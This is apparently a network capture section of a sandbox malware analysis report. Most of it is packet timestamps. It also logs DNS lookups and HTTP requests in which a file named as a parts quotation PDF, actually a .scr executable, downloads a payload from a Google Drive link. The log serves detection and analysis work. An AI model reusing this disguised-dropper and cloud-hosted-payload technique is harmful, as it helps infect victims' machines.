                                                                Dec 24, 2024 11:28:49.399732113 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.399771929 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.403000116 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.406092882 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.406141043 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.406161070 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.406178951 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.406224012 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.409425974 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.412674904 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.412724972 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.412728071 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.412743092 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.412777901 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.415647030 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.418922901 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.418975115 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.418976068 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.418987989 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.419037104 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.419377089 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.422269106 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.422312975 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.422322035 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.425236940 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.425295115 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.425302982 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.428348064 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.428394079 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.428402901 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.433238983 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.433283091 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.433291912 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.438200951 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.438258886 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.438266993 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.439631939 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.439672947 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.439681053 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.448343992 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.448421955 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.448429108 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.449532032 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.449574947 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.449583054 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.462471962 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.462519884 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.462534904 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.462543011 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.462584972 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.462946892 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.464030981 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.464070082 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.464078903 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.465157986 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.465203047 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.465210915 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.477112055 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.477169037 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.477179050 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.478157997 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.478204966 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.478214025 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.490784883 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.490885973 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.490900040 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.491003036 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.491049051 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.491056919 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.492063046 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.492110014 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.492119074 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.504265070 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.504328012 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.504331112 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.504343033 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.874773979 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.874782085 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.875089884 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.875876904 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.875933886 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.875942945 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.875987053 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.876723051 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.891519070 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.891573906 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.891606092 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.891661882 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.891673088 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.891701937 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.892158031 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.894800901 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.894809008 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.902337074 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.902462006 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.902539968 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.902549028 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.902597904 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.902618885 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.903458118 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.906770945 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.906779051 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.911015034 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.911370039 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.911418915 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.911427021 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.911473036 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.911581039 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.912312031 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.914899111 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.914906979 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.923100948 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.923435926 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.923489094 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.923496962 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.923548937 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.924098015 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.926047087 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.927040100 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.927047968 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.938106060 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.938152075 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.938189030 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.938205957 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.938219070 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.938242912 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.939862013 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.943057060 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.943064928 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.947303057 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.947613955 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.947674036 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.947683096 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.947735071 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.948447943 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.949311972 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.949358940 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.949367046 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.958755970 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.958817005 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.958825111 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.959614038 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.959661961 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.959670067 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.960385084 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.960433960 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.960441113 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.969379902 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.969443083 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.969451904 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.970247030 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.970294952 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.970307112 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.980834961 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.980897903 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.980909109 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.981267929 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.981311083 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.981359959 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.981369019 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.981419086 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.982173920 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.982950926 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.983017921 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.983026028 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.989770889 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.989830017 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.989839077 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.990761042 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.990869999 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.990920067 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.990928888 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.990976095 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.997854948 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.998229027 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.998275995 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.998285055 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.999103069 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.999151945 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.999157906 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.008795023 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.008846045 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.008855104 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.009169102 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.009213924 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.009222984 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.010155916 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.010202885 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.010210991 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.024156094 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.024209976 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.024215937 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.024230957 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.024275064 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.024521112 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.025405884 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.025449038 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.025458097 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.038539886 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.038595915 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.038605928 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.038908958 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.038955927 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.038964987 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.039824963 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.039885044 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.039892912 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.052629948 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.052686930 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.052689075 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.052700043 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.052759886 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.053035021 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.054186106 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.054246902 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.054255962 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.066809893 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.066865921 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.066874981 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.067368031 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.067414045 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.067421913 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.068193913 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.068240881 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.068248987 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.080248117 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.080300093 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.080311060 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.080764055 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.080822945 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.080831051 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.081535101 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.081583977 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.081592083 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.094286919 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.094336987 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.094345093 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.094355106 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.094400883 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.094799042 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.095671892 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.095716000 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.095724106 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.103029966 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.103080034 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.103089094 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.103449106 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.103492975 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.103499889 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.104281902 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.104331017 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.104337931 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.115328074 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.115377903 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.115395069 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.115859985 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.115907907 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.115916014 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.116674900 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.116718054 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.116730928 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.129980087 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.130024910 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.130033016 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.130326033 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.130369902 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.130378008 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.131140947 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.131185055 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.131192923 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.139337063 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.139388084 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.139389992 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.139404058 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.139448881 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.140250921 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.140991926 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.141040087 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.141047955 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.150983095 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.151036024 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.151046038 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.151410103 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.151454926 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.151463032 CET44349707142.250.181.1192.168.2.11
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 24, 2024 11:28:40.641876936 CET | 56811 | 53 | 192.168.2.11 | 1.1.1.1
Dec 24, 2024 11:28:40.780070066 CET | 53 | 56811 | 1.1.1.1 | 192.168.2.11
Dec 24, 2024 11:28:43.447410107 CET | 53416 | 53 | 192.168.2.11 | 1.1.1.1
Dec 24, 2024 11:28:43.585596085 CET | 53 | 53416 | 1.1.1.1 | 192.168.2.11

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 24, 2024 11:28:40.641876936 CET | 192.168.2.11 | 1.1.1.1 | 0x18d2 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:28:43.447410107 CET | 192.168.2.11 | 1.1.1.1 | 0xa10e | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 24, 2024 11:28:40.780070066 CET | 1.1.1.1 | 192.168.2.11 | 0x18d2 | No error (0) | drive.google.com |  | 172.217.19.238 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:28:43.585596085 CET | 1.1.1.1 | 192.168.2.11 | 0xa10e | No error (0) | drive.usercontent.google.com |  | 142.250.181.1 | A (IP address) | IN (0x0001) | false
                                                                • drive.google.com
                                                                • drive.usercontent.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.11 | 49705 | 172.217.19.238 | 443 | 7920 | C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-24 10:28:42 UTC | 205 | OUT | GET /uc?export=download&id=1IYRCMvX1A3HQ1B2VKfAKo5Zi8IP18Cl6 HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                Host: drive.google.com
2024-12-24 10:28:43 UTC | 1319 | IN | HTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Tue, 24 Dec 2024 10:28:43 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1IYRCMvX1A3HQ1B2VKfAKo5Zi8IP18Cl6&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-NB5iI7J2SX1bTCau5-U0rA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.11 | 49707 | 142.250.181.1 | 443 | 7920 | C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-24 10:28:45 UTC | 223 | OUT | GET /download?id=1IYRCMvX1A3HQ1B2VKfAKo5Zi8IP18Cl6&export=download HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                Host: drive.usercontent.google.com
2024-12-24 10:28:48 UTC | 4932 | IN | HTTP/1.1 200 OK
                                                                X-GUploader-UploadID: AFiumC7_S1-CAlj44UIjzvkPYNPvV3Ql7zo9-mvwqjdVAODW7NN6g4hk0907wTQ_hx6IMN08
                                                                Content-Type: application/octet-stream
                                                                Content-Security-Policy: sandbox
                                                                Content-Security-Policy: default-src 'none'
                                                                Content-Security-Policy: frame-ancestors 'none'
                                                                X-Content-Security-Policy: sandbox
                                                                Cross-Origin-Opener-Policy: same-origin
